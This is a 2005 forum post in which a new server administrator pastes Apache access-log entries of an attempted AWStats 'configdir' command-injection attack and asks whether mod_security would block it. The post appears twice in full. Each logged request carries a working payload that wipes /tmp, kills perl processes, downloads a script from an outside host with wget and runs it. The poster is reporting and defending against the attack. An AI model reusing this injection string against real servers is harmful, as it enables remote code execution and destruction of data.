StingRay
08-23-2005, 12:46 PM
So i was looking through my access logs today and noticed the following.
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:32 -0700] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:32 -0700] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
Looks like they tried to use an exploit in awstats to attempt to compromise the server.
Being new to server administration, I'll wondering what steps i should take when i see things like this.
I do not currently have awstats on in WHM, so I don't think they would have been successful, but I do not know for certain.
Should I be looking closer at mod_security to make sure it is set up right? Is it configured from PowerVPS, or only basic defaults? Would mod_Security handle this?
Looking for some infomed advice :)
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:32 -0700] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:32 -0700] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
Looks like they tried to use an exploit in awstats to attempt to compromise the server.
Being new to server administration, I'll wondering what steps i should take when i see things like this.
I do not currently have awstats on in WHM, so I don't think they would have been successful, but I do not know for certain.
Should I be looking closer at mod_security to make sure it is set up right? Is it configured from PowerVPS, or only basic defaults? Would mod_Security handle this?
Looking for some infomed advice :)